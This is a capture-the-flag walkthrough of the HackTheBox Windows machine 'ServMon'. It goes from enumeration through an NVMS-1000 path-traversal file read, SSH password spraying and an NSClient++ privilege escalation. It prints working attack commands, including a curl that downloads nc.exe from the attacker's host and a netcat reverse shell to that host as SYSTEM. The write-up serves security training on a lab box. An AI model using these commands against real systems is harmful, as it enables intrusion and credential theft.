ServMon Writeup
19 February 2023 #CTF #HTB #box #easy #windows
Enumeration
You already know, it's nmap time:
$ sudo nmap -n -Pn -sCV -oN enum/initial.nmap 10.10.10.184
[...]
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 06:35PM <DIR> Users
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c71af681ca1778d027dbcd462a092b54 (RSA)
| 256 3e63ef3b6e3e4a90f34c02e940672e42 (ECDSA)
|_ 256 5a48c8cd39782129effbae821d03adaf (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-02-10T13:38:45
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
[...]
FTP
As nmap told us, we can login anonymously to this FTP server. Inside the Users folder, there are 2 other folders:
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
02-28-22 06:36PM <DIR> Nadine
02-28-22 06:37PM <DIR> Nathan
Two potential usernames. Looking in Nadine's directory, there is just one text file:
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
Okay, it seems like there is a file called Passwords.txt in Nathan's desktop.
In Nathan's directory there is also one text file:
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
SMB
Unlike with FTP, we can't access SMB anonymously:
$ smbclient -NL 10.10.10.184
session setup failed: NT_STATUS_ACCESS_DENIED
$ rpcclient -U '%' -N 10.10.10.184
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
HTTP
Port 80
We get a login page:
It is pointless to try default credentials as stated in the file in Nathan's FTP folder (He changed the password).
Port 8443
Here we (are supposed to) have a network monitoring application:
The page was kinda broken for me.
Foothold
LFI in NVMS-1000
Looking for known vulnerabilities in NVMS-1000, we come across a LFI in the URL.
Let's see if it works by trying to get the Password.txt file on Nathan's desktop:
$ curl -s --path-as-is 'http://10.10.10.184/../../../../../../../../../../../../users/nathan/desktop/passwords.txt'
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Nice, we get a bunch of passwords!
Password Spraying
With a password list and 2 usernames, we can try spraying these passwords against each username and hope for the best. SSH is listening on this Windows box so we'll try it first:
$ cme ssh 10.10.10.184 -u users.txt -p passwords.txt
SSH 10.10.10.184 22 10.10.10.184 [*] SSH-2.0-OpenSSH_for_Windows_8.0
SSH 10.10.10.184 22 10.10.10.184 [-] Nadine:1nsp3ctTh3Way2Mars! Authentication failed.
SSH 10.10.10.184 22 10.10.10.184 [-] Nadine:Th3r34r3To0M4nyTrait0r5! Authentication failed.
SSH 10.10.10.184 22 10.10.10.184 [-] Nadine:B3WithM30r4ga1n5tMe Authentication failed.
SSH 10.10.10.184 22 10.10.10.184 [+] Nadine:L1k3B1gBut7s@W0rk
Great, we can log in as Nadine.
Privesc
We can find the NSClient++ config file in C:\Program Files\NSClient++\nsclient.ini:
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
[...]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
[...]
We get the password used to access the application and we learn that only localhost is allowed. That means even with the correct password, we can't access it from our attack box (it was also referenced in Nathan's file inside the FTP server).
Luckily, we can use SSH to forward a local port:
$ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
nadine@10.10.10.184's password:
[...]
This will open port 8443 on our attack box and forward it to port 8443 on the remote box (on the localhost interface).
We can use this exploit script to create a custom script in NSClient++ that will get executed by NT AUTHORITY\SYSTEM:
$ ./cve.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'ping -n 2 10.10.14.4'
[!] Targeting base URL https://127.0.0.1:8443
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: PFvFSEzz)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .
After a few seconds we get something in tcpdump:
$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:01:24.046322 IP 10.10.10.184 > 10.10.14.4: ICMP echo request, id 1, seq 1, length 40
14:01:24.046364 IP 10.10.14.4 > 10.10.10.184: ICMP echo reply, id 1, seq 1, length 40
14:01:25.131476 IP 10.10.10.184 > 10.10.14.4: ICMP echo request, id 1, seq 2, length 40
14:01:25.131501 IP 10.10.14.4 > 10.10.10.184: ICMP echo reply, id 1, seq 2, length 40
This confirms we can indeed execute code.
To get a reverse shell we'll upload nc.exe to the box:
nadine@SERVMON C:\Users\Nadine\Downloads>curl.exe 10.10.14.4/nc.exe -O
[...]
And now we can just execute it via the exploit script:
$ ./cve.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'C:\Users\Nadine\Downloads\nc.exe 10.10.14.4 443 -e cmd.exe'
[...]
Again, wait a few seconds and enjoy the reverse shell as NT AUTHORITY\SYSTEM:
$ nc -lnvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.184.
Ncat: Connection from 10.10.10.184:50613.
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
Key Takeaways
- After foothold, look for installed software in common directories
- Network monitoring application will most likely have a code execution 'feature'